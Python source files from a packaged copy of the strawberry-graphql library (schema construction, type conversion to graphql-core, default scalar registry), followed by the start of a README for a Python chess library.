from graphql.type.directives import specified_directives
from strawberry.annotation import StrawberryAnnotation
from strawberry.extensions.directives import (
DirectivesExtension,
DirectivesExtensionSync,
)
from strawberry.schema.schema_converter import GraphQLCoreConverter
from strawberry.schema.types.scalar import DEFAULT_SCALAR_REGISTRY
from strawberry.types import ExecutionContext
from strawberry.types.graphql import OperationType
from strawberry.types.types import TypeDefinition
from ..printer import print_schema
from . import compat
from .base import BaseSchema
from .config import StrawberryConfig
from .execute import execute, execute_sync
if TYPE_CHECKING:
from graphql import ExecutionContext as GraphQLExecutionContext
from graphql import ExecutionResult as GraphQLExecutionResult
from strawberry.custom_scalar import ScalarDefinition, ScalarWrapper
from strawberry.directive import StrawberryDirective
from strawberry.enum import EnumDefinition
from strawberry.extensions import SchemaExtension
from strawberry.field import StrawberryField
from strawberry.types import ExecutionResult
from strawberry.union import StrawberryUnion
DEFAULT_ALLOWED_OPERATION_TYPES = {
OperationType.QUERY,
OperationType.MUTATION,
OperationType.SUBSCRIPTION,
}
class Schema(BaseSchema):
def __init__(
self,
# TODO: can we make sure we only allow to pass
# something that has been decorated?
query: Type,
mutation: Optional[Type] = None,
subscription: Optional[Type] = None,
directives: Iterable[StrawberryDirective] = (),
types=(),
extensions: Iterable[Union[Type[SchemaExtension], SchemaExtension]] = (),
execution_context_class: Optional[Type[GraphQLExecutionContext]] = None,
config: Optional[StrawberryConfig] = None,
scalar_overrides: Optional[
Dict[object, Union[Type, ScalarWrapper, ScalarDefinition]]
] = None,
schema_directives: Iterable[object] = (),
):
self.query = query
self.mutation = mutation
self.subscription = subscription
self.extensions = extensions
self.execution_context_class = execution_context_class
self.config = config or StrawberryConfig()
SCALAR_OVERRIDES_DICT_TYPE = Dict[
object, Union["ScalarWrapper", "ScalarDefinition"]
]
scalar_registry: SCALAR_OVERRIDES_DICT_TYPE = {**DEFAULT_SCALAR_REGISTRY}
if scalar_overrides:
# TODO: check that the overrides are valid
scalar_registry.update(cast(SCALAR_OVERRIDES_DICT_TYPE, scalar_overrides))
self.schema_converter = GraphQLCoreConverter(self.config, scalar_registry)
self.directives = directives
self.schema_directives = list(schema_directives)
query_type = self.schema_converter.from_object(query._type_definition)
mutation_type = (
self.schema_converter.from_object(mutation._type_definition)
if mutation
else None
)
subscription_type = (
self.schema_converter.from_object(subscription._type_definition)
if subscription
else None
)
graphql_directives = [
self.schema_converter.from_directive(directive) for directive in directives
]
graphql_types = []
for type_ in types:
if compat.is_schema_directive(type_):
graphql_directives.append(
self.schema_converter.from_schema_directive(type_)
)
else:
if hasattr(type_, "_type_definition"):
if type_._type_definition.is_generic:
type_ = StrawberryAnnotation(type_).resolve() # noqa: PLW2901
graphql_type = self.schema_converter.from_maybe_optional(type_)
if isinstance(graphql_type, GraphQLNonNull):
graphql_type = graphql_type.of_type
if not isinstance(graphql_type, GraphQLNamedType):
raise TypeError(f"{graphql_type} is not a named GraphQL Type")
graphql_types.append(graphql_type)
try:
self._schema = GraphQLSchema(
query=query_type,
mutation=mutation_type,
subscription=subscription_type if subscription else None,
directives=specified_directives + tuple(graphql_directives),
types=graphql_types,
extensions={
GraphQLCoreConverter.DEFINITION_BACKREF: self,
},
)
except TypeError as error:
# GraphQL core throws a TypeError if there's any exception raised
# during the schema creation, so we check if the cause was a
# StrawberryError and raise it instead if that's the case.
from strawberry.exceptions import StrawberryException
if isinstance(error.__cause__, StrawberryException):
raise error.__cause__ from None
raise
# attach our schema to the GraphQL schema instance
self._schema._strawberry_schema = self # type: ignore
self._warn_for_federation_directives()
# Validate schema early because we want developers to know about
# possible issues as soon as possible
errors = validate_schema(self._schema)
if errors:
formatted_errors = "\n\n".join(f"❌ {error.message}" for error in errors)
raise ValueError(f"Invalid Schema. Errors:\n\n{formatted_errors}")
def get_extensions(
self, sync: bool = False
) -> List[Union[Type[SchemaExtension], SchemaExtension]]:
extensions = list(self.extensions)
if self.directives:
extensions.append(DirectivesExtensionSync if sync else DirectivesExtension)
return extensions
@lru_cache()
def get_type_by_name(
self, name: str
) -> Optional[
Union[TypeDefinition, ScalarDefinition, EnumDefinition, StrawberryUnion]
]:
# TODO: respect auto_camel_case
if name in self.schema_converter.type_map:
return self.schema_converter.type_map[name].definition
return None
def get_field_for_type(
self, field_name: str, type_name: str
) -> Optional[StrawberryField]:
type_ = self.get_type_by_name(type_name)
if not type_:
return None # pragma: no cover
assert isinstance(type_, TypeDefinition)
return next(
(
field
for field in type_.fields
if self.config.name_converter.get_graphql_name(field) == field_name
),
None,
)
@lru_cache()
def get_directive_by_name(self, graphql_name: str) -> Optional[StrawberryDirective]:
return next(
(
directive
for directive in self.directives
if self.config.name_converter.from_directive(directive) == graphql_name
),
None,
)
async def execute(
self,
query: Optional[str],
variable_values: Optional[Dict[str, Any]] = None,
context_value: Optional[Any] = None,
root_value: Optional[Any] = None,
operation_name: Optional[str] = None,
allowed_operation_types: Optional[Iterable[OperationType]] = None,
) -> ExecutionResult:
if allowed_operation_types is None:
allowed_operation_types = DEFAULT_ALLOWED_OPERATION_TYPES
# Create execution context
execution_context = ExecutionContext(
query=query,
schema=self,
context=context_value,
root_value=root_value,
variables=variable_values,
provided_operation_name=operation_name,
)
result = await execute(
self._schema,
extensions=self.get_extensions(),
execution_context_class=self.execution_context_class,
execution_context=execution_context,
allowed_operation_types=allowed_operation_types,
process_errors=self.process_errors,
)
return result
def execute_sync(
self,
query: Optional[str],
variable_values: Optional[Dict[str, Any]] = None,
context_value: Optional[Any] = None,
root_value: Optional[Any] = None,
operation_name: Optional[str] = None,
allowed_operation_types: Optional[Iterable[OperationType]] = None,
) -> ExecutionResult:
if allowed_operation_types is None:
allowed_operation_types = DEFAULT_ALLOWED_OPERATION_TYPES
execution_context = ExecutionContext(
query=query,
schema=self,
context=context_value,
root_value=root_value,
variables=variable_values,
provided_operation_name=operation_name,
)
result = execute_sync(
self._schema,
extensions=self.get_extensions(sync=True),
execution_context_class=self.execution_context_class,
execution_context=execution_context,
allowed_operation_types=allowed_operation_types,
process_errors=self.process_errors,
)
return result
async def subscribe(
self,
# TODO: make this optional when we support extensions
query: str,
variable_values: Optional[Dict[str, Any]] = None,
context_value: Optional[Any] = None,
root_value: Optional[Any] = None,
operation_name: Optional[str] = None,
) -> Union[AsyncIterator[GraphQLExecutionResult], GraphQLExecutionResult]:
return await subscribe(
self._schema,
parse(query),
root_value=root_value,
context_value=context_value,
variable_values=variable_values,
operation_name=operation_name,
)
def _warn_for_federation_directives(self):
"""Raises a warning if the schema has any federation directives."""
from strawberry.federation.schema_directives import FederationDirective
all_types = self.schema_converter.type_map.values()
all_type_defs = (type_.definition for type_ in all_types)
all_directives = (
directive
for type_def in all_type_defs
for directive in (type_def.directives or [])
)
if any(
isinstance(directive, FederationDirective) for directive in all_directives
):
warnings.warn(
"Federation directive found in schema. "
"Use `strawberry.federation.Schema` instead of `strawberry.Schema`.",
UserWarning,
stacklevel=3,
)
def as_str(self) -> str:
return print_schema(self)
__str__ = as_str
def introspect(self) -> Dict[str, Any]:
"""Return the introspection query result for the current schema
Raises:
ValueError: If the introspection query fails due to an invalid schema
"""
introspection = self.execute_sync(get_introspection_query())
if introspection.errors or not introspection.data:
raise ValueError(f"Invalid Schema. Errors {introspection.errors!r}")
return introspection.data | 564bff00ff-strawberry-graphql | /564bff00ff_strawberry_graphql-0.168.2-py3-none-any.whl/strawberry/schema/schema.py | schema.py |
from __future__ import annotations
import dataclasses
import sys
from functools import partial, reduce
from typing import (
TYPE_CHECKING,
Any,
Callable,
Dict,
List,
Optional,
Tuple,
Type,
TypeVar,
Union,
cast,
)
from graphql import (
GraphQLArgument,
GraphQLDirective,
GraphQLEnumType,
GraphQLEnumValue,
GraphQLField,
GraphQLInputField,
GraphQLInputObjectType,
GraphQLInterfaceType,
GraphQLList,
GraphQLNonNull,
GraphQLObjectType,
GraphQLUnionType,
Undefined,
)
from graphql.language.directive_locations import DirectiveLocation
from strawberry.annotation import StrawberryAnnotation
from strawberry.arguments import StrawberryArgument, convert_arguments
from strawberry.custom_scalar import ScalarWrapper
from strawberry.enum import EnumDefinition
from strawberry.exceptions import (
DuplicatedTypeName,
InvalidTypeInputForUnion,
InvalidUnionTypeError,
MissingTypesForGenericError,
ScalarAlreadyRegisteredError,
UnresolvedFieldTypeError,
)
from strawberry.field import UNRESOLVED
from strawberry.lazy_type import LazyType
from strawberry.private import is_private
from strawberry.schema.types.scalar import _make_scalar_type
from strawberry.type import StrawberryList, StrawberryOptional
from strawberry.types.info import Info
from strawberry.types.types import TypeDefinition
from strawberry.union import StrawberryUnion
from strawberry.unset import UNSET
from strawberry.utils.await_maybe import await_maybe
from ..extensions.field_extension import build_field_extension_resolvers
from . import compat
from .types.concrete_type import ConcreteType
if TYPE_CHECKING:
from graphql import (
GraphQLInputType,
GraphQLNullableType,
GraphQLOutputType,
GraphQLResolveInfo,
GraphQLScalarType,
ValueNode,
)
from strawberry.custom_scalar import ScalarDefinition
from strawberry.directive import StrawberryDirective
from strawberry.enum import EnumValue
from strawberry.field import StrawberryField
from strawberry.schema.config import StrawberryConfig
from strawberry.schema_directive import StrawberrySchemaDirective
from strawberry.type import StrawberryType
# graphql-core expects a resolver for an Enum type to return
# the enum's *value* (not its name or an instance of the enum). We have to
# subclass the GraphQLEnumType class to enable returning Enum members from
# resolvers.
class CustomGraphQLEnumType(GraphQLEnumType):
def __init__(self, enum: EnumDefinition, *args, **kwargs):
super().__init__(*args, **kwargs)
self.wrapped_cls = enum.wrapped_cls
def serialize(self, output_value: Any) -> str:
if isinstance(output_value, self.wrapped_cls):
return output_value.name
return super().serialize(output_value)
def parse_value(self, input_value: str) -> Any:
return self.wrapped_cls(super().parse_value(input_value))
def parse_literal(
self, value_node: ValueNode, _variables: Optional[Dict[str, Any]] = None
) -> Any:
return self.wrapped_cls(super().parse_literal(value_node, _variables))
class GraphQLCoreConverter:
# TODO: Make abstract
# Extension key used to link a GraphQLType back into the Strawberry definition
DEFINITION_BACKREF = "strawberry-definition"
def __init__(
self,
config: StrawberryConfig,
scalar_registry: Dict[object, Union[ScalarWrapper, ScalarDefinition]],
):
self.type_map: Dict[str, ConcreteType] = {}
self.config = config
self.scalar_registry = scalar_registry
def from_argument(self, argument: StrawberryArgument) -> GraphQLArgument:
argument_type = cast(
"GraphQLInputType", self.from_maybe_optional(argument.type)
)
default_value = Undefined if argument.default is UNSET else argument.default
return GraphQLArgument(
type_=argument_type,
default_value=default_value,
description=argument.description,
deprecation_reason=argument.deprecation_reason,
extensions={
GraphQLCoreConverter.DEFINITION_BACKREF: argument,
},
)
def from_enum(self, enum: EnumDefinition) -> CustomGraphQLEnumType:
enum_name = self.config.name_converter.from_type(enum)
assert enum_name is not None
# Don't reevaluate known types
cached_type = self.type_map.get(enum_name, None)
if cached_type:
self.validate_same_type_definition(enum_name, enum, cached_type)
graphql_enum = cached_type.implementation
assert isinstance(graphql_enum, CustomGraphQLEnumType) # For mypy
return graphql_enum
graphql_enum = CustomGraphQLEnumType(
enum=enum,
name=enum_name,
values={item.name: self.from_enum_value(item) for item in enum.values},
description=enum.description,
extensions={
GraphQLCoreConverter.DEFINITION_BACKREF: enum,
},
)
self.type_map[enum_name] = ConcreteType(
definition=enum, implementation=graphql_enum
)
return graphql_enum
def from_enum_value(self, enum_value: EnumValue) -> GraphQLEnumValue:
return GraphQLEnumValue(
enum_value.value,
deprecation_reason=enum_value.deprecation_reason,
description=enum_value.description,
extensions={
GraphQLCoreConverter.DEFINITION_BACKREF: enum_value,
},
)
def from_directive(self, directive: StrawberryDirective) -> GraphQLDirective:
graphql_arguments = {}
for argument in directive.arguments:
argument_name = self.config.name_converter.from_argument(argument)
graphql_arguments[argument_name] = self.from_argument(argument)
directive_name = self.config.name_converter.from_type(directive)
return GraphQLDirective(
name=directive_name,
locations=directive.locations,
args=graphql_arguments,
description=directive.description,
extensions={
GraphQLCoreConverter.DEFINITION_BACKREF: directive,
},
)
def from_schema_directive(self, cls: Type) -> GraphQLDirective:
strawberry_directive = cast(
"StrawberrySchemaDirective", cls.__strawberry_directive__
)
module = sys.modules[cls.__module__]
args: Dict[str, GraphQLArgument] = {}
for field in strawberry_directive.fields:
default = field.default
if default == dataclasses.MISSING:
default = UNSET
name = self.config.name_converter.get_graphql_name(field)
args[name] = self.from_argument(
StrawberryArgument(
python_name=field.python_name or field.name,
graphql_name=None,
type_annotation=StrawberryAnnotation(
annotation=field.type,
namespace=module.__dict__,
),
default=default,
)
)
return GraphQLDirective(
name=self.config.name_converter.from_directive(strawberry_directive),
locations=[
DirectiveLocation(loc.value) for loc in strawberry_directive.locations
],
args=args,
is_repeatable=strawberry_directive.repeatable,
description=strawberry_directive.description,
extensions={
GraphQLCoreConverter.DEFINITION_BACKREF: strawberry_directive,
},
)
def from_field(self, field: StrawberryField) -> GraphQLField:
field_type = cast("GraphQLOutputType", self.from_maybe_optional(field.type))
resolver = self.from_resolver(field)
subscribe = None
if field.is_subscription:
subscribe = resolver
resolver = lambda event, *_, **__: event # noqa: E731
graphql_arguments = {}
for argument in field.arguments:
argument_name = self.config.name_converter.from_argument(argument)
graphql_arguments[argument_name] = self.from_argument(argument)
return GraphQLField(
type_=field_type,
args=graphql_arguments,
resolve=resolver,
subscribe=subscribe,
description=field.description,
deprecation_reason=field.deprecation_reason,
extensions={
GraphQLCoreConverter.DEFINITION_BACKREF: field,
},
)
def from_input_field(self, field: StrawberryField) -> GraphQLInputField:
field_type = cast("GraphQLInputType", self.from_maybe_optional(field.type))
default_value: object
if field.default_value is UNSET or field.default_value is dataclasses.MISSING:
default_value = Undefined
else:
default_value = field.default_value
return GraphQLInputField(
type_=field_type,
default_value=default_value,
description=field.description,
deprecation_reason=field.deprecation_reason,
extensions={
GraphQLCoreConverter.DEFINITION_BACKREF: field,
},
)
FieldType = TypeVar("FieldType", GraphQLField, GraphQLInputField)
@staticmethod
def _get_thunk_mapping(
type_definition: TypeDefinition,
name_converter: Callable[[StrawberryField], str],
field_converter: Callable[[StrawberryField], FieldType],
) -> Dict[str, FieldType]:
"""Create a GraphQL core `ThunkMapping` mapping of field names to field types.
This method filters out remaining `strawberry.Private` annotated fields that
could not be filtered during the initialization of a `TypeDefinition` due to
postponed type-hint evaluation (PEP-563). Performing this filtering now (at
schema conversion time) ensures that all types to be included in the schema
should have already been resolved.
Raises:
TypeError: If the type of a field in ``fields`` is `UNRESOLVED`
"""
thunk_mapping = {}
for field in type_definition.fields:
if field.type is UNRESOLVED:
raise UnresolvedFieldTypeError(type_definition, field)
if not is_private(field.type):
thunk_mapping[name_converter(field)] = field_converter(field)
return thunk_mapping
def get_graphql_fields(
self, type_definition: TypeDefinition
) -> Dict[str, GraphQLField]:
return self._get_thunk_mapping(
type_definition=type_definition,
name_converter=self.config.name_converter.from_field,
field_converter=self.from_field,
)
def get_graphql_input_fields(
self, type_definition: TypeDefinition
) -> Dict[str, GraphQLInputField]:
return self._get_thunk_mapping(
type_definition=type_definition,
name_converter=self.config.name_converter.from_field,
field_converter=self.from_input_field,
)
def from_input_object(self, object_type: type) -> GraphQLInputObjectType:
type_definition = object_type._type_definition # type: ignore
type_name = self.config.name_converter.from_type(type_definition)
# Don't reevaluate known types
cached_type = self.type_map.get(type_name, None)
if cached_type:
self.validate_same_type_definition(type_name, type_definition, cached_type)
graphql_object_type = self.type_map[type_name].implementation
assert isinstance(graphql_object_type, GraphQLInputObjectType) # For mypy
return graphql_object_type
graphql_object_type = GraphQLInputObjectType(
name=type_name,
fields=lambda: self.get_graphql_input_fields(type_definition),
description=type_definition.description,
extensions={
GraphQLCoreConverter.DEFINITION_BACKREF: type_definition,
},
)
self.type_map[type_name] = ConcreteType(
definition=type_definition, implementation=graphql_object_type
)
return graphql_object_type
def from_interface(self, interface: TypeDefinition) -> GraphQLInterfaceType:
# TODO: Use StrawberryInterface when it's implemented in another PR
interface_name = self.config.name_converter.from_type(interface)
# Don't reevaluate known types
cached_type = self.type_map.get(interface_name, None)
if cached_type:
self.validate_same_type_definition(interface_name, interface, cached_type)
graphql_interface = cached_type.implementation
assert isinstance(graphql_interface, GraphQLInterfaceType) # For mypy
return graphql_interface
graphql_interface = GraphQLInterfaceType(
name=interface_name,
fields=lambda: self.get_graphql_fields(interface),
interfaces=list(map(self.from_interface, interface.interfaces)),
description=interface.description,
extensions={
GraphQLCoreConverter.DEFINITION_BACKREF: interface,
},
)
self.type_map[interface_name] = ConcreteType(
definition=interface, implementation=graphql_interface
)
return graphql_interface
def from_list(self, type_: StrawberryList) -> GraphQLList:
of_type = self.from_maybe_optional(type_.of_type)
return GraphQLList(of_type)
def from_object(self, object_type: TypeDefinition) -> GraphQLObjectType:
# TODO: Use StrawberryObjectType when it's implemented in another PR
object_type_name = self.config.name_converter.from_type(object_type)
# Don't reevaluate known types
cached_type = self.type_map.get(object_type_name, None)
if cached_type:
self.validate_same_type_definition(
object_type_name, object_type, cached_type
)
graphql_object_type = cached_type.implementation
assert isinstance(graphql_object_type, GraphQLObjectType) # For mypy
return graphql_object_type
def _get_is_type_of() -> Optional[Callable[[Any, GraphQLResolveInfo], bool]]:
if object_type.is_type_of:
return object_type.is_type_of
if not object_type.interfaces:
return None
def is_type_of(obj: Any, _info: GraphQLResolveInfo) -> bool:
if object_type.concrete_of and (
hasattr(obj, "_type_definition")
and obj._type_definition.origin is object_type.concrete_of.origin
):
return True
return isinstance(obj, object_type.origin)
return is_type_of
graphql_object_type = GraphQLObjectType(
name=object_type_name,
fields=lambda: self.get_graphql_fields(object_type),
interfaces=list(map(self.from_interface, object_type.interfaces)),
description=object_type.description,
is_type_of=_get_is_type_of(),
extensions={
GraphQLCoreConverter.DEFINITION_BACKREF: object_type,
},
)
self.type_map[object_type_name] = ConcreteType(
definition=object_type, implementation=graphql_object_type
)
return graphql_object_type
def from_resolver(
self, field: StrawberryField
) -> Callable: # TODO: Take StrawberryResolver
field.default_resolver = self.config.default_resolver
if field.is_basic_field:
def _get_basic_result(_source: Any, *args, **kwargs):
# Call `get_result` without an info object or any args or
# kwargs because this is a basic field with no resolver.
return field.get_result(_source, info=None, args=[], kwargs={})
_get_basic_result._is_default = True # type: ignore
return _get_basic_result
def _get_arguments(
source: Any,
info: Info,
kwargs: Dict[str, Any],
) -> Tuple[List[Any], Dict[str, Any]]:
kwargs = convert_arguments(
kwargs,
field.arguments,
scalar_registry=self.scalar_registry,
config=self.config,
)
# the following code allows to omit info and root arguments
# by inspecting the original resolver arguments,
# if it asks for self, the source will be passed as first argument
# if it asks for root, the source it will be passed as kwarg
# if it asks for info, the info will be passed as kwarg
args = []
if field.base_resolver:
if field.base_resolver.self_parameter:
args.append(source)
root_parameter = field.base_resolver.root_parameter
if root_parameter:
kwargs[root_parameter.name] = source
info_parameter = field.base_resolver.info_parameter
if info_parameter:
kwargs[info_parameter.name] = info
return args, kwargs
def _check_permissions(source: Any, info: Info, kwargs: Dict[str, Any]):
"""
Checks if the permission should be accepted and
raises an exception if not
"""
for permission_class in field.permission_classes:
permission = permission_class()
if not permission.has_permission(source, info, **kwargs):
message = getattr(permission, "message", None)
raise PermissionError(message)
async def _check_permissions_async(
source: Any, info: Info, kwargs: Dict[str, Any]
):
for permission_class in field.permission_classes:
permission = permission_class()
has_permission: bool
has_permission = await await_maybe(
permission.has_permission(source, info, **kwargs)
)
if not has_permission:
message = getattr(permission, "message", None)
raise PermissionError(message)
def _strawberry_info_from_graphql(info: GraphQLResolveInfo) -> Info:
return Info(
_raw_info=info,
_field=field,
)
def _get_result(_source: Any, info: Info, **kwargs):
field_args, field_kwargs = _get_arguments(
source=_source, info=info, kwargs=kwargs
)
return field.get_result(
_source, info=info, args=field_args, kwargs=field_kwargs
)
def wrap_field_extensions() -> Callable[..., Any]:
"""Wrap the provided field resolver with the middleware."""
if not field.extensions:
return _get_result
for extension in field.extensions:
extension.apply(field)
extension_functions = build_field_extension_resolvers(field)
return reduce(
lambda chained_fns, next_fn: partial(next_fn, chained_fns),
extension_functions,
_get_result,
)
_get_result_with_extensions = wrap_field_extensions()
def _resolver(_source: Any, info: GraphQLResolveInfo, **kwargs):
strawberry_info = _strawberry_info_from_graphql(info)
_check_permissions(_source, strawberry_info, kwargs)
return _get_result_with_extensions(_source, strawberry_info, **kwargs)
async def _async_resolver(_source: Any, info: GraphQLResolveInfo, **kwargs):
strawberry_info = _strawberry_info_from_graphql(info)
await _check_permissions_async(_source, strawberry_info, kwargs)
return await await_maybe(
_get_result_with_extensions(_source, strawberry_info, **kwargs)
)
if field.is_async:
_async_resolver._is_default = not field.base_resolver # type: ignore
return _async_resolver
else:
_resolver._is_default = not field.base_resolver # type: ignore
return _resolver
def from_scalar(self, scalar: Type) -> GraphQLScalarType:
scalar_definition: ScalarDefinition
if scalar in self.scalar_registry:
_scalar_definition = self.scalar_registry[scalar]
# TODO: check why we need the cast and we are not trying with getattr first
if isinstance(_scalar_definition, ScalarWrapper):
scalar_definition = _scalar_definition._scalar_definition
else:
scalar_definition = _scalar_definition
else:
scalar_definition = scalar._scalar_definition
scalar_name = self.config.name_converter.from_type(scalar_definition)
if scalar_name not in self.type_map:
implementation = (
scalar_definition.implementation
if scalar_definition.implementation is not None
else _make_scalar_type(scalar_definition)
)
self.type_map[scalar_name] = ConcreteType(
definition=scalar_definition, implementation=implementation
)
else:
other_definition = self.type_map[scalar_name].definition
# TODO: the other definition might not be a scalar, we should
# handle this case better, since right now we assume it is a scalar
if other_definition != scalar_definition:
other_definition = cast("ScalarDefinition", other_definition)
raise ScalarAlreadyRegisteredError(scalar_definition, other_definition)
implementation = cast(
"GraphQLScalarType", self.type_map[scalar_name].implementation
)
return implementation
def from_maybe_optional(
self, type_: Union[StrawberryType, type]
) -> Union[GraphQLNullableType, GraphQLNonNull]:
NoneType = type(None)
if type_ is None or type_ is NoneType:
return self.from_type(type_)
elif isinstance(type_, StrawberryOptional):
return self.from_type(type_.of_type)
else:
return GraphQLNonNull(self.from_type(type_))
def from_type(self, type_: Union[StrawberryType, type]) -> GraphQLNullableType:
if compat.is_generic(type_):
raise MissingTypesForGenericError(type_)
if isinstance(type_, EnumDefinition): # TODO: Replace with StrawberryEnum
return self.from_enum(type_)
elif compat.is_input_type(type_): # TODO: Replace with StrawberryInputObject
return self.from_input_object(type_)
elif isinstance(type_, StrawberryList):
return self.from_list(type_)
elif compat.is_interface_type(type_): # TODO: Replace with StrawberryInterface
type_definition: TypeDefinition = type_._type_definition # type: ignore
return self.from_interface(type_definition)
elif compat.is_object_type(type_): # TODO: Replace with StrawberryObject
type_definition: TypeDefinition = type_._type_definition # type: ignore
return self.from_object(type_definition)
elif compat.is_enum(type_): # TODO: Replace with StrawberryEnum
enum_definition: EnumDefinition = type_._enum_definition # type: ignore
return self.from_enum(enum_definition)
elif isinstance(type_, TypeDefinition): # TODO: Replace with StrawberryObject
return self.from_object(type_)
elif isinstance(type_, StrawberryUnion):
return self.from_union(type_)
elif isinstance(type_, LazyType):
return self.from_type(type_.resolve_type())
elif compat.is_scalar(
type_, self.scalar_registry
): # TODO: Replace with StrawberryScalar
return self.from_scalar(type_)
raise TypeError(f"Unexpected type '{type_}'")
def from_union(self, union: StrawberryUnion) -> GraphQLUnionType:
union_name = self.config.name_converter.from_type(union)
for type_ in union.types:
# This check also occurs in the Annotation resolving, but because of
# TypeVars, Annotations, LazyTypes, etc it can't perfectly detect issues at
# that stage
if not StrawberryUnion.is_valid_union_type(type_):
raise InvalidUnionTypeError(union_name, type_)
# Don't reevaluate known types
if union_name in self.type_map:
graphql_union = self.type_map[union_name].implementation
assert isinstance(graphql_union, GraphQLUnionType) # For mypy
return graphql_union
graphql_types: List[GraphQLObjectType] = []
for type_ in union.types:
graphql_type = self.from_type(type_)
if isinstance(graphql_type, GraphQLInputObjectType):
raise InvalidTypeInputForUnion(graphql_type)
assert isinstance(graphql_type, GraphQLObjectType)
graphql_types.append(graphql_type)
graphql_union = GraphQLUnionType(
name=union_name,
types=graphql_types,
description=union.description,
resolve_type=union.get_type_resolver(self.type_map),
extensions={
GraphQLCoreConverter.DEFINITION_BACKREF: union,
},
)
self.type_map[union_name] = ConcreteType(
definition=union, implementation=graphql_union
)
return graphql_union
def _get_is_type_of(
self,
object_type: TypeDefinition,
) -> Optional[Callable[[Any, GraphQLResolveInfo], bool]]:
if object_type.is_type_of:
return object_type.is_type_of
if object_type.interfaces:
def is_type_of(obj: Any, _info: GraphQLResolveInfo) -> bool:
if object_type.concrete_of and (
hasattr(obj, "_type_definition")
and obj._type_definition.origin is object_type.concrete_of.origin
):
return True
return isinstance(obj, object_type.origin)
return is_type_of
return None
def validate_same_type_definition(
self, name: str, type_definition: StrawberryType, cached_type: ConcreteType
) -> None:
# if the type definitions are the same we can return
if cached_type.definition == type_definition:
return
# otherwise we need to check if we are dealing with different instances
# of the same type generic type. This happens when using the same generic
# type in different places in the schema, like in the following example:
# >>> @strawberry.type
# >>> class A(Generic[T]):
# >>> a: T
# >>> @strawberry.type
# >>> class Query:
# >>> first: A[int]
# >>> second: A[int]
# in theory we won't ever have duplicated definitions for the same generic,
# but we are doing the check in an exhaustive way just in case we missed
# something.
# we only do this check for TypeDefinitions, as they are the only ones
# that can be generic.
# of they are of the same generic type, we need to check if the type
# var map is the same, in that case we can return
if (
isinstance(type_definition, TypeDefinition)
and isinstance(cached_type.definition, TypeDefinition)
and cached_type.definition.concrete_of is not None
and cached_type.definition.concrete_of == type_definition.concrete_of
and (
cached_type.definition.type_var_map.keys()
== type_definition.type_var_map.keys()
)
):
# manually compare type_var_maps while resolving any lazy types
# so that they're considered equal to the actual types they're referencing
equal = True
lazy_types = False
for type_var, type1 in cached_type.definition.type_var_map.items():
type2 = type_definition.type_var_map[type_var]
# both lazy types are always resolved because two different lazy types
# may be referencing the same actual type
if isinstance(type1, LazyType):
type1 = type1.resolve_type() # noqa: PLW2901
lazy_types = True
elif isinstance(type1, StrawberryOptional) and isinstance(
type1.of_type, LazyType
):
lazy_types = True
type1.of_type = type1.of_type.resolve_type()
if isinstance(type2, LazyType):
type2 = type2.resolve_type()
lazy_types = True
elif isinstance(type2, StrawberryOptional) and isinstance(
type2.of_type, LazyType
):
type2.of_type = type2.of_type.resolve_type()
lazy_types = True
if lazy_types and type1 != type2:
equal = False
break
if equal:
return
if isinstance(type_definition, TypeDefinition):
first_origin = type_definition.origin
elif isinstance(type_definition, EnumDefinition):
first_origin = type_definition.wrapped_cls
else:
first_origin = None
if isinstance(cached_type.definition, TypeDefinition):
second_origin = cached_type.definition.origin
elif isinstance(cached_type.definition, EnumDefinition):
second_origin = cached_type.definition.wrapped_cls
else:
second_origin = None
raise DuplicatedTypeName(first_origin, second_origin, name) | 564bff00ff-strawberry-graphql | /564bff00ff_strawberry_graphql-0.168.2-py3-none-any.whl/strawberry/schema/schema_converter.py | schema_converter.py |
import datetime
import decimal
from typing import Dict
from uuid import UUID
from graphql import (
GraphQLBoolean,
GraphQLFloat,
GraphQLID,
GraphQLInt,
GraphQLScalarType,
GraphQLString,
)
from strawberry.custom_scalar import ScalarDefinition
from strawberry.file_uploads.scalars import Upload
from strawberry.scalars import ID
from strawberry.schema.types import base_scalars
def _make_scalar_type(definition: ScalarDefinition) -> GraphQLScalarType:
from strawberry.schema.schema_converter import GraphQLCoreConverter
return GraphQLScalarType(
name=definition.name,
description=definition.description,
specified_by_url=definition.specified_by_url,
serialize=definition.serialize,
parse_value=definition.parse_value,
parse_literal=definition.parse_literal,
extensions={GraphQLCoreConverter.DEFINITION_BACKREF: definition},
)
def _make_scalar_definition(scalar_type: GraphQLScalarType) -> ScalarDefinition:
return ScalarDefinition(
name=scalar_type.name,
description=scalar_type.name,
specified_by_url=scalar_type.specified_by_url,
serialize=scalar_type.serialize,
parse_literal=scalar_type.parse_literal,
parse_value=scalar_type.parse_value,
implementation=scalar_type,
)
def _get_scalar_definition(scalar) -> ScalarDefinition:
return scalar._scalar_definition
DEFAULT_SCALAR_REGISTRY: Dict[object, ScalarDefinition] = {
type(None): _get_scalar_definition(base_scalars.Void),
None: _get_scalar_definition(base_scalars.Void),
str: _make_scalar_definition(GraphQLString),
int: _make_scalar_definition(GraphQLInt),
float: _make_scalar_definition(GraphQLFloat),
bool: _make_scalar_definition(GraphQLBoolean),
ID: _make_scalar_definition(GraphQLID),
UUID: _get_scalar_definition(base_scalars.UUID),
Upload: _get_scalar_definition(Upload),
datetime.date: _get_scalar_definition(base_scalars.Date),
datetime.datetime: _get_scalar_definition(base_scalars.DateTime),
datetime.time: _get_scalar_definition(base_scalars.Time),
decimal.Decimal: _get_scalar_definition(base_scalars.Decimal),
} | 564bff00ff-strawberry-graphql | /564bff00ff_strawberry_graphql-0.168.2-py3-none-any.whl/strawberry/schema/types/scalar.py | scalar.py |
# Pychess
[![Status][status badge]][status badge]
[![Tests][github actions badge]][github actions page]
[![Codecov][codecov badge]][codecov page]
[![Python Version][python version badge]][github page]
[![License][license badge]][license]
[code of conduct]: https://github.com/56kyle/pychess/blob/master/CODE_OF_CONDUCT.md
[codecov badge]: https://codecov.io/gh/56kyle/pychess/branch/master/graph/badge.svg?token=0QDENTNTN7
[codecov page]: https://app.codecov.io/gh/56kyle/pychess/branch/master
[contributor covenant badge]: https://img.shields.io/badge/Contributor%20Covenant-2.1-4baaaa.svg
[github actions badge]: https://github.com/56kyle/pychess/workflows/Tests/badge.svg
[github actions page]: https://github.com/56kyle/pychess/actions?workflow=Tests
[github page]: https://github.com/56kyle/pychess
[license badge]: https://img.shields.io/github/license/56kyle/pychess
[license]: https://opensource.org/licenses/MIT
[python version badge]: https://img.shields.io/pypi/pyversions/56kyle-pychess
[status badge]: https://img.shields.io/pypi/status/56kyle-pychess
A chess library written in Python.
[Pychess](#Pychess)
- [Description](#Description)
- [Installation](#Installation)
